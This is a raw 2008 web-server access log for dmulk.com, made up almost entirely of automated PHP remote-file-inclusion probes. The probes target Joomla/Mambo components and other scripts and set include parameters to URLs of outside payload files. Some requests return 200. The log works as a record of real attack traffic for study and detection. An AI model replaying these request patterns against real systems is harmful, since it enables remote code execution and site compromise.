91.198.175.18 - - [19/Jul/2008:09:23:01 -0700] "GET //popup_window.php?site_isp_root=http://www.grousetyee.com/jupload/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:23:19 -0700] "GET /logs/access_080315.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:23:19 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:23:20 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:23:22 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:23:22 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:23:28 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:23:28 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.122.200.198 - - [19/Jul/2008:09:23:43 -0700] "GET /logs/?script_root=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 200 56851 "-" "libwww-perl/5.805" "www.dmulk.com"
212.122.200.198 - - [19/Jul/2008:09:23:47 -0700] "GET /?script_root=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 200 18399 "-" "libwww-perl/5.805" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:23:55 -0700] "GET /logs/access_080225.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.55.211.40 - - [19/Jul/2008:09:24:03 -0700] "GET /minamijewelry/source_images/?N=D HTTP/1.1" 200 2414 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
216.120.241.242 - - [19/Jul/2008:09:24:12 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.120.241.242 - - [19/Jul/2008:09:24:12 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.120.241.242 - - [19/Jul/2008:09:24:12 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.120.241.242 - - [19/Jul/2008:09:24:12 -0700] "GET /errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.120.241.242 - - [19/Jul/2008:09:24:12 -0700] "GET /errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.120.241.242 - - [19/Jul/2008:09:24:12 -0700] "GET /errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.5.163.212 - - [19/Jul/2008:09:24:17 -0700] "GET /logs//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.5.163.212 - - [19/Jul/2008:09:24:17 -0700] "GET //index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:09:24:33 -0700] "GET /logs/access_080127.log%20/scanhttp://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:09:24:33 -0700] "GET /scanhttp://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:09:24:33 -0700] "GET /logs/scanhttp://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.207.2.62 - - [19/Jul/2008:09:24:56 -0700] "GET /logs/access_080313.log//main.php?appserv_root=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.207.2.62 - - [19/Jul/2008:09:24:57 -0700] "GET //main.php?appserv_root=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.207.2.62 - - [19/Jul/2008:09:24:57 -0700] "GET /logs//main.php?appserv_root=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:09:25:00 -0700] "GET /logs/scanhttp://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:09:25:00 -0700] "GET /scanhttp://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:09:25:00 -0700] "GET /logs/access_080127.log%20/scanhttp://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:09:25:01 -0700] "GET /logs/access.log/news.php?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:09:25:01 -0700] "GET /news.php?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:09:25:01 -0700] "GET /logs/news.php?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.207.2.62 - - [19/Jul/2008:09:25:17 -0700] "GET /logs/access_080225.log//main.php?appserv_root=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.169.158.65 - - [19/Jul/2008:09:25:23 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sunshineruby.com/gbook/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.199.190.37 - - [19/Jul/2008:09:25:30 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.115.114 - - [19/Jul/2008:09:25:36 -0700] "GET /index.php?pg=http://psyop.com.au/echo.txt?? HTTP/1.1" 200 18375 "-" "libwww-perl/5.812" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:09:25:39 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.158.65 - - [19/Jul/2008:09:25:39 -0700] "GET /logs/access_080118.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sunshineruby.com/gbook/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [19/Jul/2008:09:25:40 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sunshineruby.com/gbook/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [19/Jul/2008:09:25:40 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sunshineruby.com/gbook/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:09:25:43 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.108.161 - - [19/Jul/2008:09:25:49 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0174.jpg HTTP/1.1" 200 310022 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
222.73.48.200 - - [19/Jul/2008:09:26:00 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:09:26:01 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:09:26:03 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:09:26:03 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:09:26:03 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.23.156.220 - - [19/Jul/2008:09:26:04 -0700] "GET /logs/access_080118.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [19/Jul/2008:09:26:04 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [19/Jul/2008:09:26:05 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [19/Jul/2008:09:26:08 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [19/Jul/2008:09:26:09 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:09:26:19 -0700] "GET /logs/index2.php?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:09:26:19 -0700] "GET /index2.php?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.148.101.224 - - [19/Jul/2008:09:26:24 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:09:26:31 -0700] "GET /logs/index.php?x=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.169.158.65 - - [19/Jul/2008:09:26:32 -0700] "GET /logs/access_080123.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sunshineruby.com/gbook/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:09:26:32 -0700] "GET /index.php?x=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 18377 "-" "libwww-perl/5.811" "www.dmulk.com"
91.198.175.18 - - [19/Jul/2008:09:26:51 -0700] "GET /logs/access.log/?mosConfig_absolute_path=http://www.grousetyee.com/jupload/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.198.175.18 - - [19/Jul/2008:09:26:52 -0700] "GET /logs/?mosConfig_absolute_path=http://www.grousetyee.com/jupload/README? HTTP/1.1" 200 56851 "-" "libwww-perl/5.808" "www.dmulk.com"
217.23.156.220 - - [19/Jul/2008:09:26:53 -0700] "GET /logs/access_080123.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:09:27:04 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:09:27:05 -0700] "GET /errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:09:27:05 -0700] "GET /logs/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [19/Jul/2008:09:27:36 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [19/Jul/2008:09:27:36 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:09:27:50 -0700] "GET /logs/access_080225.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:09:27:56 -0700] "GET /logs/access_080313.log//admin/business_inc/saveserver.php?thisdir=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:09:27:59 -0700] "GET /logs/access_080218.log/index2.php?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:09:27:59 -0700] "GET /index2.php?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:09:27:59 -0700] "GET /logs/index2.php?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.45 - - [19/Jul/2008:09:28:09 -0700] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [19/Jul/2008:09:28:09 -0700] "GET /logs/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [19/Jul/2008:09:28:11 -0700] "GET /logs/access.log/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:09:28:12 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:09:28:12 -0700] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.188.104.4 - - [19/Jul/2008:09:28:12 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.188.104.4 - - [19/Jul/2008:09:28:14 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 200 18413 "-" "libwww-perl/5.810" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:09:28:17 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:28:17 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:28:19 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:09:28:21 -0700] "GET /logs/access.log/index2.php?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:28:23 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.70.45 - - [19/Jul/2008:09:28:41 -0700] "GET /logs/access.log/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [19/Jul/2008:09:28:41 -0700] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [19/Jul/2008:09:28:42 -0700] "GET /logs/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:09:28:47 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:09:28:47 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:09:29:26 -0700] "GET /logs/access_080513.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:29:31 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:29:31 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [19/Jul/2008:09:29:39 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [19/Jul/2008:09:29:40 -0700] "GET /logs/errors.php?error=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.188.104.4 - - [19/Jul/2008:09:29:42 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.188.104.4 - - [19/Jul/2008:09:29:44 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 200 18397 "-" "libwww-perl/5.810" "www.dmulk.com"
89.188.104.4 - - [19/Jul/2008:09:29:44 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.70.45 - - [19/Jul/2008:09:29:45 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [19/Jul/2008:09:29:46 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [19/Jul/2008:09:29:46 -0700] "GET //index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 200 18459 "-" "libwww-perl/5.65" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:29:59 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:30:00 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:09:30:02 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.70.45 - - [19/Jul/2008:09:30:19 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [19/Jul/2008:09:30:21 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [19/Jul/2008:09:30:22 -0700] "GET //index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 200 18443 "-" "libwww-perl/5.65" "www.dmulk.com"
91.198.175.18 - - [19/Jul/2008:09:30:26 -0700] "GET /logs/access_080313.log/?mosConfig_absolute_path=http://www.grousetyee.com/jupload/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:30:34 -0700] "GET /logs/access_080315.log//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:30:35 -0700] "GET //errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:30:35 -0700] "GET /logs//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.14.46.18 - - [19/Jul/2008:09:30:53 -0700] "GET /logs/access_080325.log/?mosConfig_absolute_path=http://www.gestward.pt/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:09:30:58 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:30:59 -0700] "GET /logs/access.log//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:09:30:59 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:31:00 -0700] "GET //errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:31:00 -0700] "GET /logs//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.206.182.158 - - [19/Jul/2008:09:31:01 -0700] "GET /logs/access_080313.log//main.php?appserv_root=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [19/Jul/2008:09:31:01 -0700] "GET //main.php?appserv_root=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [19/Jul/2008:09:31:02 -0700] "GET /logs//main.php?appserv_root=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:09:31:02 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:09:31:03 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:31:05 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.206.182.158 - - [19/Jul/2008:09:31:26 -0700] "GET /logs/access_080225.log//main.php?appserv_root=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
